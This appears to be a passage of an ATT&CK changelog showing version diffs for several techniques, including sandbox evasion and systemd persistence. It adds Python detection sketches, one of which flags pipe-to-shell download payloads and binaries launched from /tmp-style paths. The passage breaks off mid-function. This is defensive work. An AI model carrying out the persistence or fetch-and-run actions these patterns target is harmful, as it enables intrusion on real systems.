New Mitigations:

Details
values_changed
STIX Field: Old value → New value
modified: 2022-05-05 05:04:52.387000+00:00 → 2024-03-01 17:17:37.292000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[T1195] Supply Chain Compromise

Current version: 1.6

Version changed from: 1.5 → 1.6

New Mitigations:

Details
values_changed
STIX Field: Old value → New value
modified: 2023-03-30 21:01:42.446000+00:00 → 2024-02-26 14:23:37.009000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.5 → 1.6

[T1573.001] Encrypted Channel: Symmetric Cryptography

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field: New value
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New value
modified: 2020-03-26 21:25:37.306000+00:00 → 2023-12-26 20:58:19.356000+00:00
x_mitre_version: 1.0 → 1.1
iterable_item_added
STIX Field: New value
x_mitre_platforms: Network

[T1218] System Binary Proxy Execution

Current version: 3.1

Version changed from: 3.0 → 3.1

New Mitigations:

Details
values_changed
STIX Field: Old value → New value
modified: 2022-04-18 14:52:08.678000+00:00 → 2024-03-01 16:25:43.150000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 3.0 → 3.1

[T1497.001] Virtualization/Sandbox Evasion: System Checks

Current version: 2.2

Version changed from: 2.1 → 2.2


Old Description
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness) Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment.

Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size.

Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output.

Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)

New Description
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness) Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment.

Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Once executed, malware may also use [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) to check if it was saved in a folder or file with unexpected or even analysis-related naming artifacts such as `malware`, `sample`, or `hash`.

Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output.

Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)
Details
dictionary_item_added
STIX Field: New value
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New value
modified: 2021-10-18 14:57:07.973000+00:00 → 2024-04-19 12:49:40.919000+00:00
description (old value):
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness) Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size.
Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)
description (new value):
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness) Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry.
Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Once executed, malware may also use [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) to check if it was saved in a folder or file with unexpected or even analysis-related naming artifacts such as `malware`, `sample`, or `hash`. Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)
x_mitre_version: 2.1 → 2.2
iterable_item_added
STIX Field: New value
x_mitre_contributors: Kostya Vasilkov

[T1542.001] Pre-OS Boot: System Firmware

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI) System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.

New Description
Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.(Citation: Wikipedia BIOS)(Citation: Wikipedia UEFI)(Citation: About UEFI) System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.
Details
dictionary_item_added
STIX Field: New value
x_mitre_deprecated: False
dictionary_item_removed
STIX Field: Old value
x_mitre_permissions_required: ['Administrator', 'SYSTEM']
values_changed
STIX Field: Old value → New value
modified: 2023-03-30 21:01:49.493000+00:00 → 2024-04-16 12:21:51.311000+00:00
description (old value):
Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI) System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.
description (new value):
Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.(Citation: Wikipedia BIOS)(Citation: Wikipedia UEFI)(Citation: About UEFI) System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1
iterable_item_added
STIX Field: New value
x_mitre_platforms: Network

[T1124] System Time Discovery

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time)(Citation: Technet Windows Time Service)

System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing <code>net time \\hostname</code> to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using <code>w32tm /tz</code>.(Citation: Technet Windows Time Service)

On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd)

This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)

New Description
An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by services, such as the Windows Time Service on Windows or <code>systemsetup</code> on macOS.(Citation: MSDN System Time)(Citation: Technet Windows Time Service)(Citation: systemsetup mac time) These time settings may also be synchronized between systems and services in an enterprise network, typically accomplished with a network time server within a domain.(Citation: Mac Time Sync)(Citation: linux system time)

System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing <code>net time \\hostname</code> to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using <code>w32tm /tz</code>.(Citation: Technet Windows Time Service) In addition, adversaries can discover device uptime through functions such as <code>GetTickCount()</code> to determine how long it has been since the system booted up.(Citation: Virtualization/Sandbox Evasion)

On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd)

In addition, system calls – such as <code>time()</code> – have been used to collect the current time on Linux devices.(Citation: MAGNET GOBLIN) On macOS systems, adversaries may use commands such as <code>systemsetup -gettimezone</code> or <code>timeIntervalSinceNow</code> to gather current time zone information or current date and time.(Citation: System Information Discovery Technique)(Citation: ESET DazzleSpy Jan 2022)

This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)
Details
values_changed
STIX Field | Old value | New Value
modified | 2023-04-12 23:37:22.508000+00:00 | 2024-04-16 12:50:15.929000+00:00
description | An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time)(Citation: Technet Windows Time Service) System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz.(Citation: Technet Windows Time Service) On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd) This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb) | An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by services, such as the Windows Time Service on Windows or systemsetup on macOS.(Citation: MSDN System Time)(Citation: Technet Windows Time Service)(Citation: systemsetup mac time) These time settings may also be synchronized between systems and services in an enterprise network, typically accomplished with a network time server within a domain.(Citation: Mac Time Sync)(Citation: linux system time) System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz.(Citation: Technet Windows Time Service) In addition, adversaries can discover device uptime through functions such as GetTickCount() to determine how long it has been since the system booted up.(Citation: Virtualization/Sandbox Evasion) On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd) In addition, system calls – such as time() – have been used to collect the current time on Linux devices.(Citation: MAGNET GOBLIN) On macOS systems, adversaries may use commands such as systemsetup -gettimezone or timeIntervalSinceNow to gather current time zone information or current date and time.(Citation: System Information Discovery Technique)(Citation: ESET DazzleSpy Jan 2022) This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.3 | 1.4
iterable_item_added
STIX Field | Old value | New Value
external_references | | {'source_name': 'systemsetup mac time', 'description': 'Apple Support. (n.d.). About systemsetup in Remote Desktop. Retrieved March 27, 2024.', 'url': 'https://support.apple.com/en-gb/guide/remote-desktop/apd95406b8d/mac'}
external_references | | {'source_name': 'linux system time', 'description': 'ArchLinux. (2024, February 1). System Time. Retrieved March 27, 2024.', 'url': 'https://wiki.archlinux.org/title/System_time'}
external_references | | {'source_name': 'MAGNET GOBLIN', 'description': 'Check Point Research. (2024, March 8). MAGNET GOBLIN TARGETS PUBLICLY FACING SERVERS USING 1-DAY VULNERABILITIES. Retrieved March 27, 2024.', 'url': 'https://research.checkpoint.com/2024/magnet-goblin-targets-publicly-facing-servers-using-1-day-vulnerabilities/'}
external_references | | {'source_name': 'Mac Time Sync', 'description': "Cone, Matt. (2021, January 14). Synchronize your Mac's Clock with a Time Server. Retrieved March 27, 2024.", 'url': 'https://www.macinstruct.com/tutorials/synchronize-your-macs-clock-with-a-time-server/'}
external_references | | {'source_name': 'ESET DazzleSpy Jan 2022', 'description': 'M.Léveillé, M., Cherepanov, A.. (2022, January 25). Watering hole deploys new macOS malware, DazzleSpy, in Asia. Retrieved May 6, 2022.', 'url': 'https://www.welivesecurity.com/2022/01/25/watering-hole-deploys-new-macos-malware-dazzlespy-asia/'}
external_references | | {'source_name': 'System Information Discovery Technique', 'description': 'YUCEEL, Huseyin Can. Picus Labs. (2022, June 9). The System Information Discovery Technique Explained - MITRE ATT&CK T1082. Retrieved March 27, 2024.', 'url': 'https://www.picussecurity.com/resource/the-system-information-discovery-technique-explained-mitre-attack-t1082'}
external_references | | {'source_name': 'Virtualization/Sandbox Evasion', 'description': 'YUCEEL, Huseyin Can. Picus Labs. (2022, June 9). Virtualization/Sandbox Evasion - How Attackers Avoid Malware Analysis. Retrieved December 26, 2023.', 'url': 'https://www.picussecurity.com/resource/virtualization/sandbox-evasion-how-attackers-avoid-malware-analysis'}
x_mitre_platforms | | Linux
x_mitre_platforms | | macOS
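The new T1124 text lists the concrete commands an adversary runs to read the clock on each platform (`net time`, `w32tm /tz`, `systemsetup -gettimezone`, `show clock detail`). The following detection sketch is an added example, not part of the ATT&CK changelog or any ATT&CK tooling: it matches those command lines in process-creation records and then ranks hosts by how many distinct time-discovery behaviours they show, since a single `net time` is routine administration while several different time queries from one host in a short window is the pattern worth a look. The log lines are constructed for this example, and the record layout (timestamp, host, user, command line) is an assumption rather than any vendor's format.

```python
"""Added example: match the T1124 command-line indicators in process-creation
records and rank hosts by distinct indicators. Log lines are constructed; the
record layout (timestamp host user command_line) is an assumption."""
import re
from collections import defaultdict

# One pattern per command the technique description names. Each is anchored on
# the program name so that "net time" matches but "net user" does not, and
# "w32tm /tz" matches but "w32tm /resync" does not.
TIME_DISCOVERY_RULES = {
    "windows_net_time":   re.compile(r"(?i)(?:^|[\\/ ])net1?(?:\.exe)?\s+time\b"),
    "windows_w32tm_tz":   re.compile(r"(?i)(?:^|[\\/ ])w32tm(?:\.exe)?\s+/tz\b"),
    "macos_systemsetup":  re.compile(r"(?:^|[/ ])systemsetup\s+-gettimezone\b"),
    "network_show_clock": re.compile(r"(?i)(?:^|\s)show\s+clock\b"),
}

# Constructed sample records (not real telemetry).
SAMPLE_LOG = """\
2024-04-16T12:00:01Z ws01 alice C:\\Windows\\system32\\net.exe time \\\\dc01
2024-04-16T12:00:02Z ws01 alice C:\\Windows\\system32\\w32tm.exe /tz
2024-04-16T12:00:03Z ws01 alice C:\\Windows\\system32\\net.exe user
2024-04-16T12:00:04Z ws02 carol C:\\Windows\\system32\\w32tm.exe /resync
2024-04-16T12:00:05Z mac01 bob /usr/sbin/systemsetup -gettimezone
2024-04-16T12:00:06Z rtr01 admin show clock detail
2024-04-16T12:00:07Z srv01 svc /usr/bin/python3 /opt/app/report.py --timezone UTC
"""


def parse_record(line):
    """Split one record into its four fields; the command line may contain spaces."""
    ts, host, user, cmdline = line.split(maxsplit=3)
    return {"ts": ts, "host": host, "user": user, "cmdline": cmdline}


def detect(log_text):
    """Return one hit per (record, rule) pair whose command line matches."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_record(line)
        for rule, pattern in TIME_DISCOVERY_RULES.items():
            if pattern.search(rec["cmdline"]):
                hits.append({**rec, "rule": rule})
    return hits


def hosts_by_rule_count(hits, minimum=2):
    """Hosts that triggered at least `minimum` distinct rules, with the rules seen."""
    rules_per_host = defaultdict(set)
    for h in hits:
        rules_per_host[h["host"]].add(h["rule"])
    return {host: sorted(rules) for host, rules in rules_per_host.items()
            if len(rules) >= minimum}


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["host"]:6} {h["rule"]:20} {h["cmdline"]}')
    print("hosts with several indicators:", hosts_by_rule_count(found))
```

Against the sample, `detect` yields four hits (ws01 twice, mac01 and rtr01 once each) and `hosts_by_rule_count` singles out ws01, which ran both `net time` and `w32tm /tz`; the `net user` and `w32tm /resync` lines are deliberately near-misses to show the anchoring. The `GetTickCount()`, `time()` and `timeIntervalSinceNow` calls the description also mentions are API calls rather than command lines, so they are not visible in this data source and would need API-level telemetry.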

[T1543.002] Create or Modify System Process: Systemd Service

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description
Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.

Systemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`).(Citation: lambert systemd 2022)

Inside the `.service` unit files, the following directives are used to execute commands:(Citation: freedesktop systemd.service)

* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives execute when a service is started manually by `systemctl` or on system start if the service is set to automatically start.
* `ExecReload` directive executes when a service restarts.
* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives execute when a service is stopped.

Adversaries have created new service files, altered the commands a `.service` file’s directive executes, and modified the user directive a `.service` file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.(Citation: Anomali Rocke March 2019)(Citation: airwalk backdoor unix systems)(Citation: Rapid7 Service Persistence 22JUNE2016)

New Description
Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.

Systemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`).(Citation: lambert systemd 2022)

Inside the `.service` unit files, the following directives are used to execute commands:(Citation: freedesktop systemd.service)

* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives execute when a service is started manually by `systemctl` or on system start if the service is set to automatically start.
* `ExecReload` directive executes when a service restarts.
* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives execute when a service is stopped.

Adversaries have created new service files, altered the commands a `.service` file’s directive executes, and modified the user directive a `.service` file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.(Citation: Anomali Rocke March 2019)(Citation: airwalk backdoor unix systems)(Citation: Rapid7 Service Persistence 22JUNE2016)

The .service file’s User directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions.
Details
values_changed
STIX Field | Old value | New Value
modified | 2023-10-09 16:19:01.408000+00:00 | 2024-02-15 14:19:22.282000+00:00
description | Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible. Systemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`).(Citation: lambert systemd 2022) Inside the `.service` unit files, the following directives are used to execute commands:(Citation: freedesktop systemd.service) * `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives execute when a service is started manually by `systemctl` or on system start if the service is set to automatically start. * `ExecReload` directive executes when a service restarts. * `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives execute when a service is stopped. Adversaries have created new service files, altered the commands a `.service` file’s directive executes, and modified the user directive a `.service` file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.(Citation: Anomali Rocke March 2019)(Citation: airwalk backdoor unix systems)(Citation: Rapid7 Service Persistence 22JUNE2016) | Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible. Systemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`).(Citation: lambert systemd 2022) Inside the `.service` unit files, the following directives are used to execute commands:(Citation: freedesktop systemd.service) * `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives execute when a service is started manually by `systemctl` or on system start if the service is set to automatically start. * `ExecReload` directive executes when a service restarts. * `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives execute when a service is stopped. Adversaries have created new service files, altered the commands a `.service` file’s directive executes, and modified the user directive a `.service` file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.(Citation: Anomali Rocke March 2019)(Citation: airwalk backdoor unix systems)(Citation: Rapid7 Service Persistence 22JUNE2016) The .service file’s User directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions.
x_mitre_version | 1.4 | 1.5
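The T1543.002 text names the three things a defender should look at in a unit file: the `Exec*` directives that run commands, the `User` directive the new sentence adds, and symbolic links that let a payload live anywhere on the filesystem. The audit below is an added example written for this page, not ATT&CK's own tooling or any distribution's. It parses a unit with a small hand-rolled reader (systemd accepts repeated `ExecStartPre=` lines, which `configparser` would silently drop), strips the `-`, `@`, `+`, `!` and `:` prefixes systemd allows in front of the executable path, flags commands launched from directories an ordinary service should not run from, looks inside `sh -c` wrappers for download-and-pipe payloads, and rates findings higher when the unit runs as root (the default for system units without `User=`). The unit texts are constructed for the example, and the list of "untrusted" prefixes is this example's own choice.

```python
"""Added example: audit a systemd .service unit for the T1543.002 abuses.
Sample unit texts are constructed; the untrusted-path list is this
example's own choice, not a systemd or ATT&CK list."""
import os
import re
import shlex
import tempfile

# systemd lets a command be prefixed with "-", "@", "+", "!" or ":" before
# the executable path; strip them before inspecting the binary.
EXEC_PREFIX_CHARS = "-@+!:"
# Directories a service binary should not normally be launched from (example's choice).
UNTRUSTED_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/root/")
# Where unit files legitimately live; /dev/null is the target of a masked unit.
STANDARD_UNIT_DIRS = ("/etc/systemd/", "/usr/lib/systemd/", "/lib/systemd/", "/run/systemd/")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|da|z)?sh\b")
SHELLS = ("sh", "bash", "dash", "zsh")


def parse_unit(text):
    """Return {section: [(key, value), ...]} keeping duplicate keys in order."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, [])
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current].append((key.strip(), value.strip()))
    return sections


def audit_unit(text, system_unit=True):
    """Findings for one unit as a list of (directive, severity, reason).
    A system unit without User= runs as root, so a tampered Exec* line there
    is root code execution at boot; that is rated high, anything else medium."""
    service = parse_unit(text).get("Service", [])
    runs_as = dict(service).get("User", "root") if system_unit else "user"
    severity = "high" if runs_as == "root" else "medium"
    findings = []
    for key, value in service:
        if not key.startswith("Exec"):
            continue
        argv = shlex.split(value)
        if not argv:
            continue
        binary = argv[0].lstrip(EXEC_PREFIX_CHARS)
        if binary.startswith(UNTRUSTED_PREFIXES):
            findings.append((key, severity, f"launches {binary} from an untrusted path"))
        # A shell wrapper hides the real payload in the -c argument; inspect it too.
        if binary.rsplit("/", 1)[-1] in SHELLS and "-c" in argv:
            inline = " ".join(argv[argv.index("-c") + 1:])
            if PIPE_TO_SHELL.search(inline) or any(p in inline for p in UNTRUSTED_PREFIXES):
                findings.append((key, severity, f"shell -c payload: {inline}"))
    return findings


def symlinked_units(unit_dir):
    """Unit files that are symlinks to targets outside the standard unit
    directories. systemd follows the link, so the payload can sit anywhere;
    links into /usr/lib/systemd (aliases) or to /dev/null (masked) are normal."""
    flagged = []
    for entry in os.scandir(unit_dir):
        if entry.name.endswith(".service") and entry.is_symlink():
            target = os.path.realpath(entry.path)
            if target != "/dev/null" and not target.startswith(STANDARD_UNIT_DIRS):
                flagged.append((entry.name, target))
    return flagged


def symlink_check_demo():
    """Throwaway unit directory: one link to a payload outside it, one masked
    unit. Returns the names symlinked_units() flags (expected: evil.service)."""
    with tempfile.TemporaryDirectory() as d:
        payload_dir = os.path.join(d, "payload")
        os.mkdir(payload_dir)
        open(os.path.join(payload_dir, "x.service"), "w").close()
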